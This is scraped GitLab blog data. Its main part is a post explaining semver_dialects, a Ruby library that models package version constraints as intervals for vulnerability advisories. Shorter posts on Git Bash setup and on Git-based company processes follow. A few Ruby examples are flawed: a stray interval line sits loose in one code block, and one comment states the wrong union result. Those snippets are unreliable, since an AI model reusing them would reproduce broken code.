vulnerable dependency.\nVulnerable versions are usually expressed in terms of version intervals: for example [this out-of-bounds read vulnerability for the Python tensorflow package](https://nvd.nist.gov/vuln/detail/CVE-2021-29560) contains information about the vulnerable version by listing the four version intervals below:\n\n1. up to 2.1.4\n1. from 2.2.0 up to 2.2.3\n1. from 2.3.0 up to 2.3.3\n1. from 2.4.0 up to 2.4.2\n\nWhile SemVer is very concise and clear about the syntax and semantic of\nsemantic versions, it does not specify how to express and represent semantic\nversion constraints. In addition, SemVer is purposefully simplistic to foster\nits adoption. In practice it seems as if many ecosystems required features that\ngo beyond SemVer which led to the development of many SemVer versioning flavours as well\nas a variety of different native constraint matching syntaxes, some of which\ndeviate from the official SemVer specification.  Depending on the ecosystem you\nare working with, the same semantic version string may be treated/interpreted\ndifferently: for example both Maven and pip/PyPI treat versions `1.2.3.SP`\ndifferently because pip/PyPI lacks the notion of an `SP` post release. Apart\nfrom that, `1.2.3.SP` cannot be considered a valid semantic version according\nto the SemVer spec.\n\nToday we have a variety of different semantic versioning schemes:\n\n- `gem`: [gem requirement](https://guides.rubygems.org/specification-reference/#add_runtime_dependency)\n- `maven`: [Maven Dependency Version Requirement Specification](https://maven.apache.org/pom.html#Dependency_Version_Requirement_Specification)\n- `npm`: [node-semver](https://github.com/npm/node-semver#ranges)\n- `php`: [PHP Composer version constraints](https://getcomposer.org/doc/articles/versions.md#writing-version-constraints)\n- `pypi`: [PEP440](https://www.python.org/dev/peps/pep-0440/#version-specifiers)\n- `go`: [go semver](https://godoc.org/golang.org/x/tools/internal/semver)\n- `nuget`: [NuGet semver](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning)\n- `conan`: [node-semver flavour](https://github.com/npm/node-semver#ranges)\n\nThis SemVer versioning fragmentation limited the degree of automation we could apply to our\nadvisory extraction/generation process. This limitation motivated the\ndevelopment of a methodology and tool [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) that helps to digest and process semantic versions in a language agnostic way and, hence, helps to reduce the manual advisory curation effort.\n\nBelow, you can see an excerpt of the advisory information that is extracted and\ngenerated by our semi-automated advisory generation process:\n\n```yaml\n# ...\naffected_range: \">=1.9,\u003C=2.7.1||==2.8\"\nfixed_versions:\n- \"2.7.2\"\n- \"2.8.1\"\nnot_impacted: \"All versions before 1.9, all versions after 2.7.1 before 2.8, all versions\n  after 2.8\"\nsolution: \"Upgrade to versions 2.7.2, 2.8.1 or above.\"\n# ...\n```\n\nIn the excerpt above:\n\n- `affected_range` denotes the range of affected versions which is the machine-readable, native syntax used by the package manager/registry (in this case pypi).\n- `fixed_versions` denotes the concrete versions when the vulnerability has been fixed.\n- `not_impacted` provides a textual description of the versions that are not affected.\n- `solution` provides information about how to remediate the vulnerability.\n\nTo be able to extract and generate advisories like the one illustrated\nabove in a language/ecosystem agnostic way, we implemented and open-sourced a\ngeneric semantic version representation and processing approach called\nsemver_dialects.\n\nIn the advisory excerpt above, the `affected_range` field contains the version\nconstraints in the native constraint syntax (in this case PyPI for Python);\n`fixed_versions` can be inferred by inverting the `affected_version` (i.e.,\nnon-affected versions) and by selecting the first available  version that falls\ninto the range of non-affected versions from the native package registry; this step\nrequires our approach to be able to parse the native semantic version syntax.\n\nIn order to deal with SemVer versioning and automatically process and generate the fields according to this\ndescription, our [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) implementation had to satisfy the following requirements:\n\n1. Provide a unified interface to the language specific dialects.\n1. Match semantic versions in a language agnostic way.\n1. Invert ranges.\n1. Cope with scattered, non-consecutive ranges.\n1. Parse and produce different version syntaxes.\n1. Parse and match versions/constraints in a best-effort manner.\n\n## SemVer versioning representation\n\nFirst, we need a generic representation of a semantic version to start with. We\nassume that a semantic version is composed of prefix and suffix where the\nprefix contains segments for major, minor and patch version components as defined in the\nSemVer specification. The suffix may hold additional information about pre/post\nreleases etc. As illustrated below, the major, minor and patch prefix segments\ncan be accessed by means of the corresponding methods.\n\n``` ruby\ns1 = SemanticVersion.new('1.2.3')\nputs \"segments: #{s1}\"\n# segments: 1:2:3\nputs \"major #{s1.major}\"\n# major 1\nputs \"minor #{s1.minor}\"\n# minor 2\nputs \"patch #{s1.patch}\"\n# patch 3\n```\n\nWe cannot generally assume that all provided versions we would like to process\nfully adhere to the SemVer spec which requires a version prefix (core) to\nconsist of three segments: major, minor and patch. Hence, per default, we\nremove redundant, trailing zeros from the prefix to ensure that\n`2.0.0`, `2.0` and `2` are considered identical.\n\n[Semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) translates language specific version suffixes into numeric values. This process\ncan be described as version normalization.  For example the Maven (pre-)release\ncandidate version `2.0.0.RC1` can be translated to a numeric representation\nwith prefix: `2` and suffix `-1:1` by mapping `RC` to a numeric value (in this\nexample `-1`) and, thus, rendering it numerically comparable.\n\nAfter this normalization step, semantic version matching for two versions `vA`\nand `vB` can be implemented by simply numerically comparing their segments in a\npairwise fashion.  For unknown suffices that are not mappable to the numeric\ndomain, we use lexical matching as a default fallback strategy.\n\nIn summary, comparing two semantic versions is a two-step process:\n\n1. Normalization: Extend both semantic versions to have the same prefix length and suffix\n   lengths by appending zeros.\n1. Comparison: Iterate over segments and compare each of them numerically.\n\nFor example, after normalizing the versions `2.0.0.RC1` and `2.0.0` to `2:-1:1`\nand `2:0:0`, respectively, we can iterate over the segments (delimited by\n`:` in the example) which we can compare numerically to successfully identify\n`2:-1:1` as being the smaller (release-candidate) version in comparison to\n`2:0:0`.\n\n## Constraint syntax - everything is a linear interval\n\nTranslating semantic versions into a generic representation makes them\nnumerically comparable which is already useful but not sufficient to express SemVer versioning constraints in a language-agnostic fashion.\n\nFor representing semantic version constraints in a generic way,\nwe rely on linear intervals.  For the purpose of this blog, we define an interval as an ordered pair of two\nsemantic versions which we are referring to as lower and upper\nbounds (or cuts). For the sake of simplicity, for the remainder of\nthis section we will use simple integers as examples for lower and upper bounds, respectively.\n\nLinear intervals capture semantic version ranges symbolically which makes them\nvery versatile and space efficient. At the same time, we can rely on\nwell-established mathematical models borrowed from linear interval arithmetic\nthat enable us to translate/express any type of constraint in terms of\nmathematical set operations on intervals.\n\nIn the table below you can find all the different types of intervals we\nconsidered to model semantic version constraints and a corresponding\ndescription where `L` stands for left, `R` stands for right with `a` and `b`\nbeing the lower and upper bounds, respectively.\n\n| Type of interval | Example                    | Description                               |\n| ---------------- | ---------------------------| ----------------------------------------- |\n| LR-closed        |  `[a,b]: x >= a, x \u003C= b`   | all versions starting from a until b      |\n| L-open R-closed  |  `(a,b]: x > a, x \u003C= b`    | all versions after a until b              |\n| L-closed R-open  |  `[a,b): x >= a, x \u003C b`    | all versions starting from a before b     |\n| LR-open          |  `(a,b): x > a, x \u003C b`     | all versions between a and b              |\n| L-unbounded      |  `(-inf,b]: x \u003C= b`        | all versions until b                      |\n| R-unbounded      |  `[a,+inf): x >= a`        | all versions starting from a              |\n\nBelow you can see example output for the different types of ranges from\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) where we are using the `VersionParser` component to generate\nlinear intervals from version constraints where `,` denotes a logical\nconjunction: e.g., `>=1, \u003C=2` denotes the set of integers that are greater than or equal\nto 1 *and* smaller than or equal to two, i.e., all integers/versions numbers starting from 1 until 2.\n\n``` ruby\nputs VersionParser.parse(\">=1, \u003C=2\")\n# [1,2]\nputs VersionParser.parse(\">1, \u003C=2\")\n# (1,2]\nputs VersionParser.parse(\">=1, \u003C2\")\n# [1,2)\nputs VersionParser.parse(\">1, \u003C2\")\n# (1,2)\nputs VersionParser.parse(\"\u003C=2\")\n# (-inf,2]\nputs VersionParser.parse(\">=1\")\n# [1,+inf)\n```\n\nFor solving SemVer versioning constraints, we use linear interval arithmetic\nwhich is explained in-depth in the text-book \"[Introduction to Interval\nAnalysis](https://epubs.siam.org/doi/book/10.1137/1.9780898717716?mobileUi=0&).\"\n\nAs mentioned earlier, for our purposes, we define an interval as an ordered\npair of two semantic versions (lower and upper bound) that represents the set\nof all those semantic versions that are enclosed by lower and upper bounds.\nGiven that intervals are sets, we can perform standard set operations on\nthem.\n\nIn the context of advisory generation, there are three operations we require to\nsatisfy all the requirements we defined earlier: Intersection, Union and Complement.\nThe operations are explained in more detail in the sections below.\n\nFor the remainder of this section, we explain interval operations, using two\nexample intervals `X` and `Y` with `X=[x_l, x_u]` and `Y=[y_l, y_u]` where\n`x_l`, `x_u` denote the lower and upper bounds for `X`, and `y_l`, `y_u` denote\nthe lower and upper bounds for `Y`, respectively. In addition, we are using the\n`min` and `max` functions, where `max(a,b)` returns the largest and `min(a,b)`\nreturns the smallest value of the parameters `a` and `b`; the ∅ symbol denotes\nthe empty set.\n\n### Intersection\n\nThe recipe below illustrates how the intersection (`X` ∩ `Y`) can be computed.\n\n`X` ∩ `Y` = if `X` and `Y` have points in common `[max(x_l,y_l), min(x_u,y_u)]` else ∅\n\nIntuitively, the intersection extracts the overlap (if any) from the two\nintervals `X` and `Y`.\n\nThe code snippet below shows how the intersection is computed in [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) for the two examples:\n\n1. `[2,5]` ∩ `[3,10]`\n1. `[2,5]` ∩ `[7,10]`\n\n``` ruby\n# 1. [2,5] ∩ [3,10] = [3, 5]\nputs VersionParser.parse(\">=2, \u003C=5\").intersect(VersionParser.parse(\">=3, \u003C=10\"))\n# [3,5]\n\n# 2. [2,5] ∩ [7,10] = ∅\nputs VersionParser.parse(\">=2, \u003C=5\").intersect(VersionParser.parse(\">=7, \u003C=10\"))\n# empty\n```\n\nThe intersection operation is useful to perform semantic version matching\nfor checking whether semantic version falls into a certain version interval\nor range. For instance we may want to check whether version `1.2.3` satisfies\nthe constraint `>=1.0.0, \u003C1.2.4`. In the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), these types of\nconstraints are very common. The problem `1.2.3` ∈ `[1.0.0, 1.2.4)` can be\ntranslated to a set intersection: `[1.2.3, 1.2.3]` ∩ `[1.0.0, 1.2.4)` =\n`[1.2.3, 1.2.3]`  which returns a non-empty set and, hence, tells us that\nversion `1.2.3` satisfies the given version constraints.\n\nIn the context of our advisory generation process, we use intersection to\ncross-validate versions from vulnerability reports (CVEs) with versions of the\navailable package that are available on the package registry that serves it.\n\nFor convenience, as mentioned earlier, [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) also supports grouping\nintervals into ranges by means of the `VersionRange` class. A range is a set of intervals\nwhich we denote with `{I0, I1, ..., IN}` where `I` denotes version intervals\ndelimited by `,` which can be interpreted as a union operator (explained in the next section).\n\nA range is a set of intervals. In the example below, we first create a range\n`r1` to which we are adding two intervals: `r1 = {[2.2.1, 5.1.2], (3.1, 10)}`.\nAfter that, there is a check for an overlap (i.e., an intersection) between\n`r1` and `[0, 2.1)` (no overlap) as well as `[5.5, 5.5]` (overlap). You can see\nthe output of [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) in the excerpt below.\n\n``` ruby\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=2.1.2, \u003C=5.1.2\"))\nr1.add(VersionParser.parse(\">3.1, \u003C10\"))\n\nputs \"[0,2.1) in #{r1}? #{r1.overlaps_with?(VersionParser.parse(\">=0, \u003C2.1\"))}\"\n# [0,2.1) in [2.1.2,5.1.2],(3.1,10)? false\nputs \"[5.5,5.5] overlap with #{r1}? #{r1.overlaps_with?(VersionParser.parse(\"=5.5\"))}\"\n# [5.5,5.5] overlap with [2.1.2,5.1.2],(3.1,10)? true\n```\n\n### Union\n\nThe recipe below illustrates how the union (`X` ∪ `Y`) can be computed.\n\n`X` ∪ `Y` = if `X` and `Y` have points in common `{[min(x_l,y_l), max(x_u,y_u)]}` else `{X,Y}`\n\nThe code snippet below shows how the union can be computed with\n [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) for the two examples:\n1. `[2,5]` ∪ `[3,10]` = `{[2,5], [3,10]}` = `{[2, 10]}`\n2. `[2,5]` ∪ `[7,10]` = `{[2,5], [7,10]}`\n\nWith the union operator, we can collapse version intervals in case they have an\noverlap/intersection; otherwise, if `X` and `Y` are disjoint, we add their\nintervals directly to the range.\n\n``` ruby\n# 1. [2,5] ∪ [3,10] = [2, 10]\nputs \"union: #{VersionParser.parse(\">=2, \u003C=5\").union(VersionParser.parse(\">=3, \u003C=10\"))}\"\n# union: [2,10]\n\n# Version ranges perform union two for the purpose of automatically collapsing\n# intervals (if possible)\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=2, \u003C=5\"))\nr1.add(VersionParser.parse(\">=3, \u003C=10\"))\nputs \"r1: #{r1}\"\n# union: [2,5],[3,10]\nputs \"r1 collapsed: #{r1.collapse}\" # creates the union between intervals\n# r1 collapsed: [2,10]\n\n# 2. [2,5] ∪ [7,10] = {[2, 10], [7,10]}\nr2 = VersionRange.new\nr2.add(VersionParser.parse(\">=2, \u003C=5\"))\nr2.add(VersionParser.parse(\">=7, \u003C=10\"))\nputs \"r2: #{r2}\"\n# r2: [2,5],[7,10]\n```\n\nIn the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), vulnerability data usually lists a set of intervals for\ndependencies that are susceptible to a given vulnerability like the [tensorflow example](https://nvd.nist.gov/vuln/detail/CVE-2021-29560) in the introduction where the following versions are affected:\n\n1. up to 2.1.4\n1. from 2.2.0 up to 2.2.3\n1. from 2.3.0 up to 2.3.3\n1. from 2.4.0 up to 2.4.2\n\nThis list of intervals can be represented as a single range (`VersionRange`) by\ncombining all of the mentioned version intervals through the union operator.\n\nIn the Ruby code example above, you can also see the `collapse` method which is\ninvoked on a `VersionRange` object. This method automatically collapses\noverlapping intervals that are included in the same `VersionRange` to eliminate\nredundant intervals. Collapsing the range `{[2, 5], [3, 10]}` yields a new range\n`{[2,10]}` with only one interval while preserving semantic equivalence.\n\n### Complement\n\nThe recipe below, illustrates how the relative complement (`X` - `Y`) can be computed.\n\n`X` - `Y`: `Z` := `X` ∩ `Y`;\n        if (`z_l` > `x_l` && `z_u` \u003C `x_u`)\n          `{[x_l, z_l),(z_u, x_u]}`\n        else if (`x_l` \u003C `z_l`)\n          `{[x_l, z_l)}`\n        else if (`x_u` > `z_u`)\n          `{(z_u, x_u]}`\n\nIntuitively, this recipe computes the intersection (`Z`) between `X` and `Y` and\nremoves all elements from `X` that are included in the intersection. The\nexamples below illustrate the recipe:\n\n1. `[3, 5]` - `[1, 3]`: with `Z` = `[3, 3]` we get `{(3, 5]}` which is\n   equivalent to `{[4, 5]}`\n1. `[3, 10]` - `[10, 11]`: with `Z` = `[10, 10]` we get `{[3, 10)}` which is equivalent to `{[3, 9]}`\n1. `[1, 5]` - `[2, 2]`: with `Z` = `[2, 2]` we get `[1, 2), (2, 5]` which is equivalent to `{[1, 1], [3, 5]}`\n\nWith the recipe above, we can also compute the absolute complement `X` - `Y` by\nassuming `X` is the universe that captures the entirety of all possible values:\n`(-inf,+inf)`. The universal complement can be defined as `~X` = `(-inf,+inf)` - `X`.\n\nWith [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects), the absolute complement can be computed by means of the\n`invert` method as illustrated in the example below.\n\n``` ruby\n# example 1: ~[1,3] = {(-inf,0],[4, +inf)} = {(-inf,1),(3,+inf)}\nr1 = VersionRange.new\nr1.add(VersionParser.parse(\">=1, \u003C=3\"))\nputs r1.invert\n# (-inf,1),(3,+inf)\n\n# example 2: ~{[2.1.2, 5.1.2], (3.1, 10)} = ~{[2.1.2, 10)} = {(-inf,2.1.2),[10,+inf)}\n{(-inf,0],[4, +inf)} = {(-inf,1),(3,+inf)}\nr2 = VersionRange.new\nr2.add(VersionParser.parse(\">=2.1.2, \u003C=5.1.2\"))\nr2.add(VersionParser.parse(\">3.1, \u003C10\"))\nputs r2.collapse.invert\n# (-inf,2.1.2),[10,+inf)\n```\n\nIn the context of [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/), this functionality is used to automatically infer\nnon-affected versions from the affected versions information: if `[1, 3]`\nrepresents all the affected versions of a vulnerable package, its complement\n`{(-inf,1),(3,+inf)}`, per definition, captures only the unaffected version. In\nour advisory generation process we cross-validate the version information of\npackages from the package registries with this information about unaffected versions to check whether or not unaffected packages are available; if this is the case, we add the corresponding remediation information to the generated advisories.\n\n## Version Translation\n\nLinear interval arithmetic provides us with all the means necessary to\nrepresent and solve SemVer versioning constraints in a language-agnostic way.\nHowever, in order to leverage the generic representation, we have to be able to\nautomatically translate the native semantic version dialects into the generic\nrepresentation and vice versa. The details of this translation functionality\nare provided below.\n\n[Semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) offers a `VersionTranslator` class. The `VersionTranslator` takes a native semantic version constraint, and translates\nit into an intermediate string representation that can then be translated into a range (`VersionRange`) by using the `VersionParser`. Currently semver_dialects supports all the syntax listed below by invoking\n`translate_\u003Cpackage_type>` where `\u003Cpackage_type>` is one of:\n\n- `gem`: [gem requirement](https://guides.rubygems.org/specification-reference/#add_runtime_dependency)\n- `maven`: [Maven Dependency Version Requirement Specification](https://maven.apache.org/pom.html#Dependency_Version_Requirement_Specification)\n- `npm`: [node-semver](https://github.com/npm/node-semver#ranges)\n- `packagist`: [PHP Composer version constraints](https://getcomposer.org/doc/articles/versions.md#writing-version-constraints)\n- `pypi`: [PEP440](https://www.python.org/dev/peps/pep-0440/#version-specifiers)\n- `go`: [go semver](https://godoc.org/golang.org/x/tools/internal/semver)\n- `nuget`: [NuGet semver](https://docs.microsoft.com/en-us/nuget/concepts/package-versioning)\n- `conan`: [node-semver flavour](https://github.com/npm/node-semver#ranges)\n\nThe example below illustrates how the [semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects)' `VersionTranslator` can\nbe used to translate native version syntax to an intermediate representation.\nThe `VersionTranslator` parses the native version syntax and translates it into\na common format. In the example below, you can further see that both\nnative, semantically equivalent but syntactically different version strings for\npackagist and maven are translated into a common format: a string array\nwhere a single array entry represents a conjunct of the semantic version\nconstraints. This translation step removes all language-specific features\nfrom the native semantic version constraints.\n\n``` ruby\n# native packagist version constraint syntax\nvs_packagist = \"\u003C2.5.9||>=2.6.0,\u003C2.6.11\"\n# native maven version constraint syntax\nvs_maven = \"(,2.5.9),[2.6.0,2.6.11)\"\n\n# translate\nputs VersionTranslator.translate_packagist(vs_packagist).to_s\n# [\"\u003C2.5.9\", \">=2.6.0 \u003C2.6.11\"]\nputs VersionTranslator.translate_maven(vs_maven).to_s\n# [\"\u003C2.5.9\", \">=2.6.0 \u003C2.6.11\"]\n```\n\nThis common format can then be translated to a version interval by means of\n`VersionParser` and `VersionRange`. The example below illustrates how the\nversion interval `constraint` is generated by iterating over the array elements\nof our intermediate representation, translating them to intervals and adding\nthese intervals to the `VersionRange` object `constraint`. At the end of the\nexcerpt below, we check whether version `1.0.0` satisfies the version\nconstraint `\u003C2.5.9||>=2.6.0,\u003C2.6.11` which correctly yields `true`.\n\n``` ruby\n# translate native maven version constraint to range of interval\nconstraint = VersionRange.new\nVersionTranslator.translate_maven(vs_maven).each do |version_string|\n  constraint \u003C\u003C VersionParser.parse(version_string)\nend\n\nputs constraint.overlaps_with?(VersionParser.parse('=' + '1.0.0'))\n# true\n```\n\n## Wrapping it up\n\nWe discussed the fragmentation of SemVer versioning which poses a challenge\nwhen building automation around semantic version processing for\nmulti-language/ecosystem applications. In this blog post, we used our internal\nsemi-automated process for advisory generation as an example.\n\nWe illustrated how we tackled the above-mentioned challenge by building a\ngeneric/language-agnostic semantic version approach based on linear interval\narithmetic. All mechanisms discussed in this blog post are implemented in the open-sourced (MIT)\n[semver_dialects](https://gitlab.com/gitlab-org/vulnerability-research/foss/semver_dialects) implementation and published on [rubygems.org](https://rubygems.org/gems/semver_dialects).\n",[865,685,9],{"slug":2037,"featured":6,"template":689},"generic-semantic-version-processing","content:en-us:blog:generic-semantic-version-processing.yml","Generic Semantic Version Processing","en-us/blog/generic-semantic-version-processing.yml","en-us/blog/generic-semantic-version-processing",{"_path":2043,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2044,"content":2050,"config":2055,"_id":2057,"_type":14,"title":2058,"_source":16,"_file":2059,"_stem":2060,"_extension":19},"/en-us/blog/git-command-line-on-windows-with-git-bash",{"title":2045,"description":2046,"ogTitle":2045,"ogDescription":2046,"noIndex":6,"ogImage":2047,"ogUrl":2048,"ogSiteName":673,"ogType":674,"canonicalUrls":2048,"schema":2049},"Git command line on Windows with Git Bash","Learn about Git Bash, how it works, how to install it, and the main commands you need to know.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749660028/Blog/Hero%20Images/blog-image-template-1800x945__25_.png","https://about.gitlab.com/blog/git-command-line-on-windows-with-git-bash","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git command line on Windows with Git Bash\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-12-16\",\n      }",{"title":2045,"description":2046,"authors":2051,"heroImage":2047,"date":2052,"body":2053,"category":10,"tags":2054},[970],"2024-12-16","Git commands allow developers to manage different versions of code and collaborate as a team. If you're in a Windows environment, you may have heard of Git Bash, a Bash terminal emulator that includes a Windows-friendly version of Git. Discover everything you need to know about installing Git Bash in this guide.\n\n## How does Git Bash work?   \nGit Bash is an application that you can install on Windows operating systems using Git for Windows. This application acts as an emulator to use the [Git version control tool](https://about.gitlab.com/topics/version-control/what-is-git-version-control/#what-is-git) on a Bash command terminal.\n\nBash is an acronym for Bourne Again SHell. SHell refers to the command terminal application of an operating system (OS). Bourne Again SHell is actually an upgraded version of Bourne SHell (also referred to as shell sh), the command line interface for UNIX developed by Stephen Bourne in 1977.  \n\nBash is the default shell for Linux and MacOS operating systems. With Git Bash, Windows users can install Bash, run Bash commands and use Git commands.\n\n## How to install Git Bash   \n\nTo download Git Bash, it is necessary to install Git for Windows. To do this, go to the official [Git for Windows](https://gitforwindows.org/) website and click \"Download\" to install the full Git package. When the download is complete, open the .exe file and begin the installation.  \n\nTo install Git Bash on Windows, please follow these step-by-step instructions:\n\n1. Open the .exe file and click **Next**. Select the appropriate folder for the installation.  \n2. Accept the terms of use and click **Next** to start the installation.  \n3. In this step, select the components to install. The pre-selected settings are relevant, but you can change them according to your preferences. Click **Next** again.  \n4. Then, choose the editor you prefer to use with Git. The tool recognizes editors already installed on your computer.  \n5. A window is displayed with three settings of the PATH environment. Depending on your needs, choose whether Git should only be used by Git Bash or if you want to use it from other third-party software.  \n6. Finally, keep the default settings by clicking **Next** and install Git Bash by clicking **Install**.\n\n## What are Bash commands?   \nFirst of all, the `pwd` (Print Working Directory) command allows you to view the absolute path. This means that it displays the path of the folder we are in at the time of typing the command.  \n**Remember:** When you open the Git Bash terminal, you are in a folder on your computer. Usually, this is the folder with your username.  \n\nThe `ls` command gives access to the list of files present in the current folder. You can also add options to the `ls` command with a dash `-`. For example, the `-l` option after `ls` lists the contents of a folder with more information about each file.\n\nBash also has a `cd` (Change Directory) command to move around your computer. To indicate the directory you want to go to, please specify the relative or absolute path after `cd`. The relative path is the location relative to the current directory while the absolute path is its location relative to the root folder.\n\n## How to use Git Bash with GitLab   \nUsing Git Bash with [GitLab](https://about.gitlab.com/) is like using the terminal emulator with another source code management platform. In order to push and retrieve your changes from GitLab, add the URL of your GitLab remote repository with the command: `git remote add origin \u003Crepository_url>`.\n\nIf your project is private, Git Bash asks you to authenticate yourself. Enter your credentials when the terminal requests your username and password. If you're having trouble logging in, check your authorization settings directly in GitLab.\n\nThen use the basic Git commands like `git clone`, `git commit`, `git push`, `git branch`, as well as `git checkout`, to name a few. To learn more, visit our [Git Cheat Sheet](https://about.gitlab.com/images/press/git-cheat-sheet.pdf).\n\n## Git Bash FAQ   \n**Are Git Bash and GitLab compatible?**\n\nYes. Using Git Bash with GitLab is similar to working with another source code management platform. Be sure to set up GitLab as a remote repository and authenticate yourself during the initial setup.\n\n**Why use Git Bash?**\n\nGit Bash acts as a terminal emulator to use the Git and Bash commands in a Windows environment.  \n\n**What's the point of a shell?**\n\nUsing a shell allows you to automate tasks through scripts, effectively control your computer and benefit from direct access to system functions.\n\n## Read more\n- [What is Git version control?](https://about.gitlab.com/topics/version-control/what-is-git-version-control/)\n- [What's new in Git 2.47.0?](https://about.gitlab.com/blog/whats-new-in-git-2-47-0/)\n- [Git pull vs. git fetch: What's the difference?](https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference/)",[751,9],{"slug":2056,"featured":6,"template":689},"git-command-line-on-windows-with-git-bash","content:en-us:blog:git-command-line-on-windows-with-git-bash.yml","Git Command Line On Windows With Git Bash","en-us/blog/git-command-line-on-windows-with-git-bash.yml","en-us/blog/git-command-line-on-windows-with-git-bash",{"_path":2062,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2063,"content":2069,"config":2076,"_id":2078,"_type":14,"title":2079,"_source":16,"_file":2080,"_stem":2081,"_extension":19},"/en-us/blog/git-for-business-processes",{"title":2064,"description":2065,"ogTitle":2064,"ogDescription":2065,"noIndex":6,"ogImage":2066,"ogUrl":2067,"ogSiteName":673,"ogType":674,"canonicalUrls":2067,"schema":2068},"How we use Git as the blockchain for process changes","Git can be useful for more than just coding and operations. It can help you run your entire business – here's how we do it.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679971/Blog/Hero%20Images/git-blockchain.jpg","https://about.gitlab.com/blog/git-for-business-processes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we use Git as the blockchain for process changes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2019-01-15\",\n      }",{"title":2064,"description":2065,"authors":2070,"heroImage":2066,"date":2072,"body":2073,"category":2074,"tags":2075},[2071],"Aricka Flowers","2019-01-15","\n\nGit may have started out as a way to collaborate on code, but there’s no denying that it has crept into the operations side of things. But does it stop there? We don’t think so.\n\nJust like [blockchain technology](https://blockgeeks.com/guides/what-is-blockchain-technology/) was originally created for cryptocurrency, but is now seen as a revolutionary way to share, store and update [all kinds of data](https://www.fool.com/investing/2018/04/11/20-real-world-uses-for-blockchain-technology.aspx), we see – and use – Git in much the same way.\n\nIn addition to version controlling code and the environment in which it lives, Git can also be used at a high level to facilitate the way a company actually functions, according to our CEO [Sid Sijbrandij](/company/team/#sytses).\n\nHe says GitLab is a prime example of how it can be done.\n\n## How we use Git to run GitLab, the company\n\n\"We’re not just trying to version our code and operations, we're also trying to version all the processes we have at the company, and we do that for a whole slew of reasons,\" says Sid. \"If you write your processes down, it's easier to change and for someone to propose a change. If it's all stored in people's heads, how are you going to change it? You'll have to create a presentation and make sure everyone reads it. But if it’s written down, it's faster to make a change and you're better able to communicate the context for it.\"\n\n### How Git has helped us to scale\n\nUsing Git to implement procedural changes within the company has helped GitLab shoulder growing pains, thanks to our [handbook](/handbook/).\n\n\"Although we're not a perfect company by any means, we've been able to scale really rapidly, onboard people and get them started with the work they have to do,\" Sid says. \"And I think our handbook and how we describe things is an important part of that. It's exciting to see it grow. The handbook is now over 2,000 pages, so people can't read everything anymore, but they can read the parts that are relevant to them, and it's really helping with organizational changes that are happening between different departments.\"\n\nSid admits running a business with Git collaboration can seem like a daunting task, especially for companies that did not start out functioning that way. But he urges business leaders to give the process a chance, pointing to a number of companies that are adopting Git as a way to make procedural changes, including O’Reilly Media and several law firms.\n\n## Two tips for adopting Git to run your business\n\n### 1. Evangelize from the top down\n\n\"First of all, this is super hard. It's unnatural and it requires constant campaigning from the top of the company,\" Sid said. \"The natural state is for all the documentation to get out of date, and for people to send each other emails and PowerPoints about the change they want to make without looking at the rest of the changes.\"\n\n### 2. Make processes easier to change\n\n\"What you frequently find in companies is that there's the official process, and then the process that people really use. You can prevent that by making processes easier to change. The reality is people are changing processes in a company every single day, and they have to make those changes quickly. So the harder you make it, the more diversions there will be between reality and what's in the handbook. Instead, empower everyone in the organization to make those changes and do so quickly. That is one of the most important things you can do.\"\n\n\"Our handbook is [Creative Commons](https://creativecommons.org/licenses/by-sa/4.0/), so feel free to use that as a starting point for anything that you do.\" [Tweet us](http://twitter.com/gitlab) if you do borrow from or adapt our handbook – we'd love to hear about it.\n\n[Cover image](https://unsplash.com/photos/mf-o1E7omzk) by [chuttersnap](https://unsplash.com/@chuttersnap) on Unsplash\n{: .note}\n","culture",[779,751,803,9,686],{"slug":2077,"featured":6,"template":689},"git-for-business-processes","content:en-us:blog:git-for-business-processes.yml","Git For Business Processes","en-us/blog/git-for-business-processes.yml","en-us/blog/git-for-business-processes",{"_path":2083,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2084,"content":2090,"config":2095,"_id":2097,"_type":14,"title":2098,"_source":16,"_file":2099,"_stem":2100,"_extension":19},"/en-us/blog/git-merge-fifteen-year-git-party",{"title":2085,"description":2086,"ogTitle":2085,"ogDescription":2086,"noIndex":6,"ogImage":2087,"ogUrl":2088,"ogSiteName":673,"ogType":674,"canonicalUrls":2088,"schema":2089},"Git Merge 2020: a celebration of Git","A look at Git Merge 2020 and a look forward to the next decade of remote, async, and powerful source code management.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681154/Blog/Hero%20Images/GitLab-sponsoring-Git-Merge.jpg","https://about.gitlab.com/blog/git-merge-fifteen-year-git-party","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git Merge 2020: a celebration of Git\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jordi Mon\"}],\n        \"datePublished\": \"2020-03-25\",\n      